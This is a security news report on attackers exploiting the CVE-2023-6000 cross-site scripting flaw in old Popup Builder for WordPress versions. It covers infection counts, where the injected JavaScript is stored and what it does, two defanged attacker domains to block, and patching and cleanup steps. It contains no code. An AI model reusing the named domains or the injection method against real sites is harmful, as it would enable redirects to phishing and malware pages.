A vulnerability in outdated versions of the Popup Builder plugin for WordPress is being exploited by hackers, leading to breaches on numerous websites. Over 3,300 websites have been infected with malicious code as a result.
The specific flaw being exploited, known as CVE-2023-6000, is a cross-site scripting (XSS) vulnerability affecting Popup Builder versions 4.2.3 and older. This vulnerability was first disclosed in November 2023.
Earlier this year, a campaign called Balada Injector took advantage of this vulnerability to infect more than 6,700 websites, indicating that many site administrators had not promptly patched their systems.
Sucuri, a cybersecurity firm, has identified a recent surge in attacks targeting the same vulnerability in the WordPress plugin over the past three weeks.
According to findings from PublicWWW, instances of code injections associated with this latest campaign have been discovered on 3,329 WordPress sites, with Sucuri’s scanners detecting 1,170 infections.
The malicious code is typically injected into the Custom JavaScript or Custom CSS sections of the WordPress admin interface, and it is stored within the ‘wp_postmeta’ database table.
This code primarily functions as event handlers for various Popup Builder plugin events, enabling actions such as popup openings and closings to trigger the execution of malicious code.
Sucuri notes that while the exact actions of the injected code may vary, the primary objective appears to be redirecting visitors to infected sites to malicious destinations, such as phishing pages and sites distributing malware.
One observed variant of the injection involves retrieving a malicious code snippet from an external source and injecting it into the webpage head for execution by the browser.
This method allows attackers to achieve various malicious goals, potentially more severe than simple redirections.
To defend against these attacks, it is recommended to block the domains “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com” from which the attacks originate.
Additionally, website owners using the Popup Builder plugin should update to the latest version (currently 4.2.7), which addresses CVE-2023-6000 and other security issues.
Despite the availability of patches, a significant number of active sites—estimated to be at least 80,000—are still using Popup Builder versions 4.1 and older, leaving them vulnerable to exploitation.
In the event of an infection, the removal process involves deleting malicious entries from the Popup Builder’s custom sections and conducting scans to identify and remove any hidden backdoors to prevent reinfection.